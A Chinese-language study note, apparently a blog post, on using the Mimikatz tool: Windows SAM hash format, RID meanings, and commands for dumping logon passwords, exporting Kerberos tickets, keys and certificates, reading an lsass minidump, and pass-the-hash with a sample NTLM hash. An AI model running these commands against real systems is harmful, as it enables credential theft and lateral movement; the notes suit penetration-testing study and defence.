Mimikatz 使用学习
下载地址
https://github.com/gentilkiwi/mimikatz/
windows:https://download.csdn.net/download/think_ycx/9362975
官方使用教程
http://www.91ri.org/15178.html
windows密码文件的解读
加密方式链接:
https://blog.csdn.net/ytfhjhv/article/details/83513671
存储位置:C:\windows\system32\config\SAM
密码文件存储格式:
Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值
SID和RID的解读:
链接:https://www.secpulse.com/archives/72017.html
SID:安全标示符,是Windows系统用于唯一标识用户或组的可变长度结构
RID:Windows系统账户对应固定的RID
500: ADMINISTRATOR
501: GUEST
502: krbtgt(域环境)
512: Domain Admins(域环境)
513: Domain Users(域环境)
514: Domain Guests(域环境)
515: Domain Computers(域环境)
516: Domain Controllers(域环境)
命令
standard
退出
exit
清屏
cls
将所所有输出记录到文件中
log other.log
log /stop (停止文件记录)
从磁盘上的文件写入切换到Base64输出
base64
kerbreros::list /export
进入目录
cd xxx
privilege
privilege::debug
备注: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061表示所需的特权不是由客户端拥有的(通常您不是管理员)
crypto
提供的程序
crypto::providers
此命令列出系统存储中的逻辑存储
参数:
/systemstore- 可选 -必须使用列表存储系统存储(默认CERT_SYSTEM_STORE_CURRENT_USER),
它可以是一个:
CERT_SYSTEM_STORE_CURRENT_USER 要么 CURRENT_USER
CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY 要么 USER_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE 要么 LOCAL_MACHINE
CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY 要么 LOCAL_MACHINE_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE 要么 LOCAL_MACHINE_ENTERPRISE
CERT_SYSTEM_STORE_CURRENT_SERVICE 要么 CURRENT_SERVICE
CERT_SYSTEM_STORE_USERS 要么 USERS
CERT_SYSTEM_STORE_SERVICES 要么 SERVICES
crypto::stores /systemstore:local_machine
此命令列出系统上或驱逐到系统上的智能卡/令牌读取器。
crypto::sc
此命令创建由证书颁发机构签名的用于智能卡身份验证的客户端证书
参数:
/caname -证书颁发机构的主题名称(需要签署证书)
/castore- 可选 -包含证书颁发机构的系统存储(默认:CERT_SYSTEM_STORE_LOCAL_MACHINE)
/upn-用户主要名称(UPN)为对象(如:user@lab.local)
/pfx- 可选 -用于保存最终证书的文件名(默认值:无文件,存储在中CERT_SYSTEM_STORE_CURRENT_USER)
crypto::scauth /caname:KiwiAC /upn:user@lab.local /pfx:user.pfx
此命令列出证书及其密钥的属性,它也可以到处证书
参数:
/systemstore- 可选 -必须使用系统存储(默认:CERT_SYSTEM_STORE_CURRENT_USER)
/store- 可选 -必须用于列出/导出证书的存储(默认值:My)-具有以下内容的完整列表crypto::stores
/export- 可选 -导出所有的证书文件(在公共部位DER,在私处PFX的文件-有密码保护:mimikatz)
/silent- 可选 -如果需要用户交互,则中止
/nokey- 可选 -请勿尝试与私钥进行交互
certificates /systemstore:local_machine /store:my /export
备注:
请参阅crypto::stores以获取有效systemstore列表,其输出用于store列表。
不可导出的键(带有KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b))通常可以通过crypto::capi和/或导出crypto::cng
尽管crypto::capi或crypto::cng补丁,你必须在正确的文件系统ACL访问私有密钥
一些智能卡加密提供商可以报告成功的私人出口
键
此命令按提供程序列出密钥。它也可以导出密钥。
参数:
/provider- 可选 -传统CryptoAPI提供商(默认:MS_ENHANCED_PROV)
/providertype- 可选 -传统CryptoAPI提供者类型(默认值:PROV_RSA_FULL)
/cngprovider- 可选 -的CNG提供商(默认:Microsoft Software Key Storage Provider)
/export- 可选 -将所有密钥导出到PVK文件
/silent- 可选 -如果需要用户交互,则中止
crypto::keys /export
sekurlsa
登录密码
sekurlsa::logonpasswords
pth
参数:
/user -您要模拟的用户名,请记住,管理员不是此知名帐户的唯一名称。
/domain-完全限定的域名-没有域,或者在本地用户/管理员的情况下,请使用计算机或服务器名称,workgroup或其他名称。
/rc4或/ntlm- 可选 -用户密码的RC4密钥/ NTLM哈希。
/aes128- 可选 -从用户密码和域领域派生的AES128密钥。
/aes256- 可选 -从用户密码和域域派生的AES256密钥。
/run- 可选 -要运行的命令行-默认为:cmd具有外壳。
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
备注:
此命令不适用于小型转储(废话);
它需要提升的特权(privilege::debug或SYSTEM帐户),与使用一种官方API的“通行票”不同;
这个新版本的“通过-散列”将RC4 keysKerberos 替换为ntlm散列(和/或替换AES密钥)-它允许Kerberos提供程序询问TGT票证!;
ntlm在XP / 2003 / Vista / 2008和7 / 2008r2 / 8/2012之前,哈希是必需的kb2871997(AES不可用或不可替换);
AES密钥只能在8.1 / 2012r2或7 / 2008r2 / 8/2012上替换为kb2871997,在这种情况下,您可以避免使用ntlm哈希。
tickets
sekurlsa::tickets /export
ekeys
sekurlsa::ekeys
dpapi
sekurlsa::dpapi
minidump
sekurlsa::minidump lsass.dmp
kerberos
sekurlsa::kerberos
lsadump
vault
token
event
ts
process
service
net
misc
library mimilib
driver mimidrv
以上命令官方教程都有,这就不在摘抄了。。。
Mimikatz 使用学习的更多相关文章
- [转帖]mimikatz 学习
mimikatz mimikatz 2.0 vient de sortir en version alpha binaires : https://github.com/gentilkiwi/mimi ...
- 如何防御mimikatz致敬Mimikatz攻防杂谈学习笔记
零.绪论:mimikatz简介 mimikatz是一款出色的内网渗透工具,可以抓取windows主机的明文密码.NTLMhash值或者kerberos对应的缓存凭据.mimikatz的使用在获取权限后 ...
- 23.通过MS17_010来学习msf对渗透的利用
Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段.本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit. 漏洞环境: 靶机:wi ...
- [转帖][思路/技术]Mimikatz的多种攻击方式以及防御方式
[思路/技术]Mimikatz的多种攻击方式以及防御方式 https://bbs.ichunqiu.com/thread-53954-1-1.html 之前学习过 抄密码 没想到还有这么多功能. ...
- Cobalt Strike学习笔记
Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java ...
- msf学习笔记
metasploit frame 这是一个渗透测试框架,围绕这个框架,我们就可以完成最终的目标,即渗透测试. 渗透测试者困扰:需要掌握数百个工具,上千条命令参数,很难记住. 新出现的漏洞PoC/EXP ...
- 黑盒渗透测试【转自HACK学习-FoxRoot】
因 搜到一篇写渗透测试步骤比较详细的文章,转过来学习,方便时常看看. 内容如下: 一.信息搜集 主动/被动搜集 信息搜集分为主动信息搜集和被动信息搜集. 主动信息搜集就是通过直接访问和扫描信息的方式进 ...
- 从直播编程到直播教育:LiveEdu.tv开启多元化的在线学习直播时代
2015年9月,一个叫Livecoding.tv的网站在互联网上引起了编程界的注意.缘于Pingwest品玩的一位编辑在上网时无意中发现了这个网站,并写了一篇文章<一个比直播睡觉更奇怪的网站:直 ...
- Angular2学习笔记(1)
Angular2学习笔记(1) 1. 写在前面 之前基于Electron写过一个Markdown编辑器.就其功能而言,主要功能已经实现,一些小的不影响使用的功能由于时间关系还没有完成:但就代码而言,之 ...
随机推荐
- 靶形数独 (dfs+预处理+状态压缩)
#2591. 「NOIP2009」靶形数独 [题目描述] 小城和小华都是热爱数学的好学生,最近,他们不约而同地迷上了数独游戏,好胜的他们想用数独来一比高低.但普通的数独对他们来说都过于简单了,于是他们 ...
- 2019牛客暑期多校训练营(第三场) - J - LRU management - 模拟
https://ac.nowcoder.com/acm/contest/883/J 根据这个数据结构的特点,也就是计算机组成原理里面学过的cache的LRU管理算法,每次访问都会在cache中查询一页 ...
- Python 函数知识总汇
函数在一个程序起到很重要的作用,那么如何学好函数呢,那函数有什么内容的,总结一下函数的知识归类 1,函数定义 def 函数名(): print("...") 2,函数返回值 re ...
- 什么是dockerfile?
什么是dockerfile? Dockerfile是一个包含用于组合映像的命令的文本文档.可以使用在命令行中调用任何命令. Docker通过读取Dockerfile中的指令自动生成映像. docker ...
- [TabControl] TabControl控件的最佳实践,可以把一个窗体和用户控件添加进来
看下效果吧<ignore_js_op> 下面是一个公共的添加方法看代码 [C#] 纯文本查看 复制代码 ? 01 02 03 04 05 06 07 08 09 10 11 12 13 1 ...
- sort对数组排序
描述 Array的sort方法用于对原数组进行排序,不会产生新的数组.排序默认的规则是按照数组元素的字符编码进行排序.如果要按照自己的意愿对数组进行升序或者降序排序,就需要对sort传入一个比较函数 ...
- Vue实现点击li变色
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title> ...
- vue实现搜索功能
vue实现搜索功能 template 部分 <!-- 搜索页面 --> <template> <div> <div class="goback&qu ...
- Centos安装ifstat统计网络流量
原文地址: http://www.winvps.org/post/504.html 下载 ifstat , http://gael.roualland.free.fr/ifstat/ifstat-1 ...
- Q开头的类找不到,无法加载插件:com.mysema.maven:apt-maven-plugin
http://www.jspxcms.com/documentation/297.html 如果出现无法加载com.mysema.maven:apt-maven-plugin插件的情况,通常是由于ma ...